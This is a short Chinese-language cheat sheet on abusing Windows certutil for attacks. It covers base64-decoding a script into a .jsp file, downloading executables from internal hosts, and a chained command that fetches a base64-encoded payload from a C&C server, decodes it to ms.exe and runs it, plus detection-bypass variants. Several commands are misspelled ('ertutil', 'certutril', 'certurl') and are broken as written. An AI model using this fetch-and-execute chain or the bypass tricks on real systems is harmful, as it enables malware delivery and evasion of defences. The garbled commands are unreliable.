Certutil 使用笔记

Certutil Base64 解码写入

echo 'PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==' > 1.txt
certutil.exe -decode 1.txt 2.jsp

certutil 下载文件

certutil.exe -urlcache -split -f <url>
# 示例：
certutil.exe -urlcache -split -f http://192.168.245.130:8080/1.txt
# 或者：
certutil.exe -urlcache -split -f http://192.168.245.130:8080/1.txt 2.txt

certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe
certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe
certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete

# 查看缓存
certutil.exe -urlcache *

# 转为 base64
ertutil -encode lcx64.exe lcx64.txt

# 解码
certutil -decode lcx64.txt lcx64.exe

# 对文件进行编码下载后解码执行
base64 payload.exe > /var/www/html/1.txt # 在 C&C 上生成经 base64 编码的 exe

certutril -urlcache -split -f <http://192.168.0.107/1.txt> & certurl -decode 1.txt ms.exe & ms.exe

# bypass
Certutil & Certutil –urlcache –f –split url
Certutil | Certutil –urlcache –f –split url

附录

参考资料

• SHELL 写文件的几种方式 | r0yanx’s Blog